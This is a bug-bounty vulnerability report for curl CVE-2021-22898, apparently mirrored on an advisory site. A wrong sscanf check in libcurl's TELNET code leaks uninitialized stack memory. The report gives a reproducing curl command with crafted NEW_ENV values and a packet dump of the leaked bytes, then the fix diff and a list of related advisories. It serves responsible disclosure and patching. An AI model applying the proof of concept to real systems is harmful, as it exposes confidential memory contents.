Lucene search
NyymiH1:1176461HistoryApr 27, 2021 - 9:49 a.m.
curl: CVE-2021-22898: TELNET stack contents disclosure
2021-04-2709:49:43
nyymi
hackerone.com
$1000
8
3.1 Low
CVSS3
Attack Vector
NETWORK
Attack Complexity
HIGH
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
LOW
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N
2.6 Low
CVSS2
Access Vector
NETWORK
Access Complexity
HIGH
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:H/Au:N/C:P/I:N/A:N
0.002 Low
EPSS
Percentile
51.9%
Summary:
lib/telnet.c suboption function incorrecly checks for the sscanf return value. Instead of checking that 2 elements are parsed, the code also continues if just one element matches:
if(sscanf(v->data, "%127[^,],%127s", varname, varval)) {
As such it is possible to construct environment values that don’t update the varval buffer and instead use the previous value. In combination of advancing in the temp buffer by strlen(v->data) + 1, this means that there will be uninitialized gaps in the generated output temp buffer. These gaps will contain whatever stack contents from previous operation of the application.
Fortunately the environment is controlled by the client and not the server. As such this vulnerability can’t be exploited by the server. Practical exploitation is limited by the following requirements:
- attacker is able to control the environment passed to libcurl via
CURLOPT_TELNETOPTIONS(“NEW_ENV=xxx,yyy”) and controlxxxandyyyin the curl_slist entries) - attacker is able to either inspect the network traffic of the telnet connection or to select the server/port the connection is established to
When both are true the attacker is able to some content of the stack. Note however that for this leak to be meaningful, some confidential or sensitive information would need to be leaked. This could happen if some key or other sensitive material (that is otherwise out of the reach of the attacker, due to for example setuid + dropping of privileges, or for example only being able to execute the command remotely in a limited fashion, for example php curl, or similar) would thus become visible fully, or partially. The leak is limited to maximum about half of the 2048 byte temp buffer.
Steps To Reproduce:
- Run telnet service
- tcpdump -i lo -X -s 65535 port 23
- Execute
curl -tNEW_ENV=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa,aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa -tNEW_ENV=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa,aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa -tNEW_ENV=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa,aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa -tNEW_ENV=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa,aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa -tNEW_ENV=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa,aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa -tNEW_ENV=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa,aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa -tNEW_ENV=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa,aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa telnet://127.0.0.1 <<< foo
You’ll see something like:
0x0000: 4500 073a 9711 4000 4006 9eaa 7f00 0001 E..:..@.@.......
0x0010: 7f00 0001 c79c 0017 f499 4092 2173 31a0 ..........@.!s1.
0x0020: 8018 0200 052f 0000 0101 080a d7e7 b666 ...../.........f
0x0030: d7e7 b666 fffa 2700 0061 6161 6161 6161 ...f..'..aaaaaaa
0x0040: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa
0x0050: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa
0x0060: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa
0x0070: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa
0x0080: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa
0x0090: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa
0x00a0: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa
0x00b0: 6161 6161 6161 6161 0100 0000 0000 0000 aaaaaaaa........
0x00c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x00d0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x00e0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x00f0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0100: 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0110: 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0120: 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0130: 0000 0000 0000 0000 0061 6161 6161 6161 .........aaaaaaa
0x0140: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa
0x0150: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa
0x0160: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa
0x0170: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa
0x0180: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa
0x0190: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa
0x01a0: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa
0x01b0: 6161 6161 6161 6161 0100 0000 6025 fec0 aaaaaaaa....`%..
0x01c0: 7c7f 0000 0000 0000 0000 0000 e002 0000 |...............
0x01d0: 0000 0000 60cd f654 7c55 0000 0088 2975 ....`..T|U....)u
0x01e0: 780b b94a 0000 0000 0000 0000 c45d b9aa x..J.........]..
0x01f0: fd7f 0000 a05b b9aa fd7f 0000 a05c b9aa .....[.......\..
0x0200: fd7f 0000 2042 f754 7c55 0000 702a f754 .....B.T|U..p*.T
0x0210: 7c55 0000 0000 0000 0000 0000 148f e7c0 |U..............
0x0220: 7c7f 0000 3000 0000 3000 0000 505b b9aa |...0...0...P[..
0x0230: fd7f 0000 905a b9aa 0061 6161 6161 6161 .....Z...aaaaaaa
0x0240: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa
0x0250: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa
0x0260: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa
0x0270: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa
0x0280: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa
0x0290: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa
0x02a0: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa
0x02b0: 6161 6161 6161 6161 0100 0000 605d b9aa aaaaaaaa....`]..
0x02c0: fd7f 0000 605d b9aa fd7f 0000 695d b9aa ....`]......i]..
0x02d0: fd7f 0000 ffff ffff ffff ffff 605d b9aa ............`]..
0x02e0: fd7f 0000 ffff ffff ffff ffff 0000 0000 ................
0x02f0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0300: 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0310: 0000 0000 1000 0000 0000 0000 7413 f1c0 ............t...
0x0320: 7c7f 0000 0000 b9aa fd7f 0000 0000 0000 |...............
0x0330: 0000 0000 1000 0000 0061 6161 6161 6161 .........aaaaaaa
0x0340: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa
0x0350: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa
0x0360: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa
0x0370: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa
0x0380: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa
0x0390: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa
0x03a0: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa
0x03b0: 6161 6161 6161 6161 0100 0000 e82e f754 aaaaaaaa.......T
0x03c0: 7c55 0000 0000 0000 0000 0000 702a f754 |U..........p*.T
0x03d0: 7c55 0000 2042 f754 7c55 0000 148f e7c0 |U...B.T|U......
0x03e0: 7c7f 0000 3000 0000 3000 0000 105d b9aa |...0...0....]..
0x03f0: fd7f 0000 505c b9aa fd7f 0000 0088 2975 ....P\........)u
0x0400: 780b b94a c05d b9aa fd7f 0000 2042 f754 x..J.].......B.T
0x0410: 7c55 0000 7f00 0000 0000 0000 0000 0000 |U..............
0x0420: 0000 0000 0000 0000 0000 0000 0100 0000 ................
0x0430: 0000 0000 a47b e2c0 0061 6161 6161 6161 .....{...aaaaaaa
0x0440: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa
0x0450: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa
0x0460: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa
0x0470: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa
0x0480: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa
0x0490: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa
0x04a0: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa
0x04b0: 6161 6161 6161 6161 0100 0000 aea3 e7c0 aaaaaaaa........
0x04c0: 7c7f 0000 1700 0000 0000 0000 1000 0000 |...............
0x04d0: 3000 0000 005f b9aa fd7f 0000 305e b9aa 0...._......0^..
0x04e0: fd7f 0000 0180 adfb fd7f 0000 47f3 f654 ............G..T
0x04f0: 7c55 0000 49f3 f654 7c55 0000 40f2 f654 |U..I..T|[email protected]
0x0500: 7c55 0000 40f2 f654 7c55 0000 40f2 f654 |[email protected]|[email protected]
0x0510: 7c55 0000 40f2 f654 7c55 0000 40f2 f654 |[email protected]|[email protected]
0x0520: 7c55 0000 49f3 f654 7c55 0000 0000 0000 |U..I..T|U......
0x0530: 0000 0000 0000 0000 0061 6161 6161 6161 .........aaaaaaa
0x0540: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa
0x0550: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa
0x0560: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa
0x0570: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa
0x0580: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa
0x0590: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa
0x05a0: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa
0x05b0: 6161 6161 6161 6161 0100 0000 1f00 0000 aaaaaaaa........
0x05c0: 0000 0000 3001 0000 0000 0000 0000 0000 ....0...........
0x05d0: 0000 0000 0200 0000 3000 0000 6e00 0000 ........0...n...
0x05e0: 7c00 0000 0000 0000 0000 0000 5b00 0000 |...........[...
0x05f0: 7700 0000 0000 0000 0000 0000 0000 0000 w...............
0x0600: 0000 0000 8038 f754 7c55 0000 0000 0000 .....8.T|U......
0x0610: 0000 0000 1000 0000 0000 0000 b0ff ffff ................
0x0620: ffff ffff 805f b9aa fd7f 0000 2042 f754 ....._.......B.T
0x0630: 7c55 0000 1a21 f954 0061 6161 6161 6161 |U...!.T.aaaaaaa
0x0640: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa
0x0650: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa
0x0660: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa
0x0670: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa
0x0680: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa
0x0690: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa
0x06a0: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa
0x06b0: 6161 6161 6161 6161 0100 5600 0000 0000 aaaaaaaa..V.....
0x06c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x06d0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x06e0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x06f0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0700: 0000 0000 f7f9 bbaa fd7f 0000 0100 0000 ................
0x0710: 0000 0000 b05f b9aa fd7f 0000 0e5f 07c1 ....._......._..
0x0720: 7c7f 0000 0100 0000 0000 0000 417b eec0 |...........A{..
0x0730: 7c7f 0000 6161 6161 fff0 |...aaaa..
Fix
diff --git a/lib/telnet.c b/lib/telnet.c
index f96a4cb4c..845b59db5 100644
--- a/lib/telnet.c
+++ b/lib/telnet.c
@@ -921,7 +923,7 @@ static void suboption(struct Curl_easy *data)
size_t tmplen = (strlen(v->data) + 1);
/* Add the variable only if it fits */
if(len + tmplen < (int)sizeof(temp)-6) {
- if(sscanf(v->data, "%127[^,],%127s", varname, varval)) {
+ if(sscanf(v->data, "%127[^,],%127s", varname, varval) == 2) {
msnprintf((char *)&temp[len], sizeof(temp) - len,
"%c%s%c%s", CURL_NEW_ENV_VAR, varname,
CURL_NEW_ENV_VALUE, varval);
Impact
Leak of potentially confidential information.
Related
prion
prion
Stack overflow
2021-06-11 16:15:00
nessus
nessus
SUSE SLES11 Security Update : curl (SUSE-SU-2021:14760-1)
2021-07-01 00:00:00
SUSE SLES12 Security Update : curl (SUSE-SU-2021:1763-1)
2021-05-27 00:00:00
EulerOS 2.0 SP5 : curl (EulerOS-SA-2021-2325)
2021-09-07 00:00:00
suse
suse
Security update for curl (moderate)
2021-07-11 00:00:00
Security update for curl (moderate)
2021-05-29 00:00:00
openvas
openvas
SUSE: Security Advisory (SUSE-SU-2021:14760-1)
2021-07-01 00:00:00
openSUSE: Security Advisory for curl (openSUSE-SU-2021:1762-1)
2021-07-13 00:00:00
Huawei EulerOS: Security Advisory for curl (EulerOS-SA-2021-2577)
2021-10-26 00:00:00
ubuntucve
ubuntucve
CVE-2021-22898
2021-05-26 00:00:00
CVE-2021-22925
2021-07-21 00:00:00
cloudlinux
cloudlinux
Fix of CVE: CVE-2021-22898
2021-09-21 22:04:32
archlinux
archlinux
[ASA-202106-8] libcurl-gnutls: information disclosure
2021-06-01 00:00:00
[ASA-202106-9] lib32-libcurl-gnutls: information disclosure
2021-06-01 00:00:00
[ASA-202106-5] lib32-curl: multiple issues
2021-06-01 00:00:00
ibm
ibm
Security Bulletin: Security Vulnerabilities affect IBM Cloud Private - curl (CVE-2021-22898)
2022-04-22 13:35:52
Security Bulletin: IBM Aspera High-Speed Transfer Server, Endpoint, and Desktop Client are vulnerable to libcurl vulnerabilities (CVE-2021-22901, CVE-2021-22898)
2021-09-30 20:07:53
Security Bulletin: Multiple vulnerabilities in Curl affect PowerSC
2021-11-01 20:13:42
osv
osv
CVE-2021-22898
2021-06-11 16:15:11
curl - security update
2021-08-09 00:00:00
curl vulnerability
2022-01-20 11:40:36
cve
cve
CVE-2021-22898
2021-06-11 16:15:00
cbl_mariner
cbl_mariner
CVE-2021-22898 affecting package curl 7.76.0-6
2022-04-09 06:51:45
CVE-2021-22898 affecting package curl 7.76.0-9
2021-06-09 03:50:28
debiancve
debiancve
CVE-2021-22898
2021-06-11 16:15:00
veracode
veracode
Information Disclosure
2021-05-28 12:59:20
Information Disclosure
2021-07-22 05:50:58
f5
f5
K22415133 : cURL vulnerability CVE-2021-22898
2021-10-12 00:00:00
alpinelinux
alpinelinux
CVE-2021-22898
2021-06-11 16:15:00
redhatcve
redhatcve
CVE-2021-22898
2021-05-26 09:45:53
CVE-2021-22925
2021-07-21 09:20:15
mageia
mageia
Updated curl packages fix a security vulnerability
2021-06-09 00:45:12
debian
debian
[SECURITY] [DLA 2734-1] curl security update
2021-08-13 04:32:15
[SECURITY] [DLA 3085-1] curl security update
2022-08-28 23:00:51
[SECURITY] [DSA 5197-1] curl security update
2022-08-01 16:58:44
fedora
fedora
[SECURITY] Fedora 34 Update: curl-7.76.1-3.fc34
2021-05-28 01:01:28
[SECURITY] Fedora 33 Update: curl-7.71.1-10.fc33
2021-08-07 01:14:48
[SECURITY] Fedora 33 Update: curl-7.71.1-11.fc33
2021-10-02 01:10:15
hackerone
hackerone
curl: CVE-2021-22925: TELNET stack contents disclosure again
2021-06-11 12:15:31
photon
photon
Home
Download Photon OS
User Documentation
FAQ
Security Advisories
Related Information
Lightwave - PHSA-2021-1.0-0393
2021-05-26 00:00:00
Important Photon OS Security Update - PHSA-2021-0033
2021-05-26 00:00:00
Important Photon OS Security Update - PHSA-2021-0393
2021-05-26 00:00:00
amazon
amazon
ubuntu
ubuntu
curl vulnerability
2022-01-20 00:00:00
curl vulnerabilities
2021-07-22 00:00:00
curl vulnerabilities
2023-02-27 00:00:00
oraclelinux
oraclelinux
curl security and bug fix update
2021-11-16 00:00:00
cloudfoundry
cloudfoundry
USN-5021-1: curl vulnerabilities | Cloud Foundry
2021-09-07 00:00:00
almalinux
almalinux
Moderate: curl security and bug fix update
2021-11-09 09:38:13
redhat
redhat
(RHSA-2021:4511) Moderate: curl security and bug fix update
2021-11-09 09:38:13
(RHSA-2022:0318) Moderate: Red Hat OpenShift distributed tracing 2.1.0 security update
2022-01-27 16:46:55
(RHSA-2022:0434) Moderate: Release of OpenShift Serverless 1.20.0
2022-02-03 17:07:25
rocky
rocky
curl security and bug fix update
2021-11-09 09:38:13
gentoo
gentoo
cURL: Multiple vulnerabilities
2021-05-26 00:00:00
ics
ics
Siemens SINEC INS
2022-03-10 12:00:00
Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP V3.1
2023-12-14 12:00:00
oracle
oracle
Oracle Critical Patch Update Advisory - July 2021
2021-07-20 00:00:00
Oracle Critical Patch Update Advisory - January 2022
2022-01-18 00:00:00
Oracle Critical Patch Update Advisory - April 2022
2022-04-19 00:00:00
3.1 Low
CVSS3
Attack Vector
NETWORK
Attack Complexity
HIGH
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
LOW
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N
2.6 Low
CVSS2
Access Vector
NETWORK
Access Complexity
HIGH
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:H/Au:N/C:P/I:N/A:N
0.002 Low
EPSS
Percentile
51.9%
Related for H1:1176461